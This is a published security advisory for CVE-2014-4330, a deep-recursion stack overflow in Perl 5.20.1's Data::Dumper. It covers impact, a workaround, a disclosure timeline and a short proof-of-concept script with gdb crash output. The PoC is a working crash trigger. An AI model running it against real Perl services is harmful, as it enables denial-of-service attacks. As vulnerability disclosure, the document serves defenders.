Perl 5.20.1 Deep Recursion Stack Overflow

`=== LSE Leading Security Experts GmbH - Security Advisory LSE-2014-06-10 ===  
  
Perl CORE - Deep Recursion Stack Overflow  
-----------------------------------------  
  
Affected Versions  
=================  
Perl v5.20.1 and below  
  
  
Issue Overview  
==============  
Vulnerability Type: Stack Overflow  
Technical Risk: high  
Likelihood of Exploitation: low  
Vendor: Perl  
Vendor URL: http://www.perl.org  
Credits: LSE Leading Security Experts GmbH employee Markus Vervier  
Advisory URL: https://www.lsexperts.de/advisories/lse-2014-06-10.txt  
Advisory Status: Public  
CVE-Number: CVE-2014-4330  
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4330  
  
  
Impact  
======  
When the runtime stack grows over its maximal size, a guard page on most modern  
operating systems is hit causing the Perl interpreter to crash.  
Depending on context code execution on some architectures might be possible  
if certain conditions are met.  
  
  
Issue Description  
=================  
During internal development a stack overflow was discovered when serializing  
data via the Data::Dumper extension which is part of Perl-Core.  
By using the "Dumper" method on a large Array-Reference which recursively  
contains other Array-References, it is possible to cause many recursive  
calls to the DD_dump native function and ultimately exhaust all available stack  
memory.  
  
  
Temporary Workaround and Fix  
============================  
Applications written in Perl should ensure that a sanity check on data  
serialized by Data::Dumper is performed.  
  
According to the vendor a patch is available and coordinated with downstream  
vendors.  
  
  
Proof of Concept  
================  
$ cat min.pl  
use strict;  
use Data::Dumper;  
  
my $dumpme = [];  
for (my $i = 0; $i < $ARGV[0]; $i++) {  
$dumpme = [$dumpme, "AAAAAAAA"];  
}  
print Dumper($dumpme);  
  
$ gdb --args perl min.pl 20000  
GNU gdb (GDB) 7.4.1-debian  
Copyright (C) 2012 Free Software Foundation, Inc.  
License GPLv3+: GNU GPL version 3 or later  
<http://gnu.org/licenses/gpl.html>  
This is free software: you are free to change and redistribute it.  
There is NO WARRANTY, to the extent permitted by law. Type "show copying"  
and "show warranty" for details.  
This GDB was configured as "x86_64-linux-gnu".  
For bug reporting instructions, please see:  
<http://www.gnu.org/software/gdb/bugs/>...  
Reading symbols from /usr/bin/perl...Reading symbols from  
/usr/lib/debug/usr/bin/perl...done.  
done.  
(gdb) run  
Starting program: /usr/bin/perl min.pl 20000  
warning: no loadable sections found in added symbol-file system-supplied  
DSO at  
0x7ffff7ffa000  
[Thread debugging using libthread_db enabled]  
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".  
  
Program received signal SIGSEGV, Segmentation fault.  
_IO_vfprintf_internal (s=0x7fffff7ff5c0, format=0x7ffff6bf5f89 "%ld",  
ap=0x7fffff7ff6f0) at vfprintf.c:1328  
1328 vfprintf.c: No such file or directory.  
  
It was confirmed that the overflow can be triggered via the XML::Parser  
extension when parsing and dumping specially crafted XML-Documents.  
  
  
History  
=======  
2014-06-10 Issue discovery during internal development  
2014-06-11 Vendor contacted  
2014-06-11 Vendor reply  
2014-06-13 CVE requested  
2014-07-01 Vulnerability confirmed by vendor  
2014-07-02 CVE-2014-4330 assigned  
2014-09-25 Advisory released  
  
GPG Signature  
=============  
This advisory is signed with the GPG key of the  
LSE Leading Security Experts GmbH advisories team.  
The key can be downloaded here: https://www.lsexperts.de/advisories-key-99E3277C.asc  
  
  
`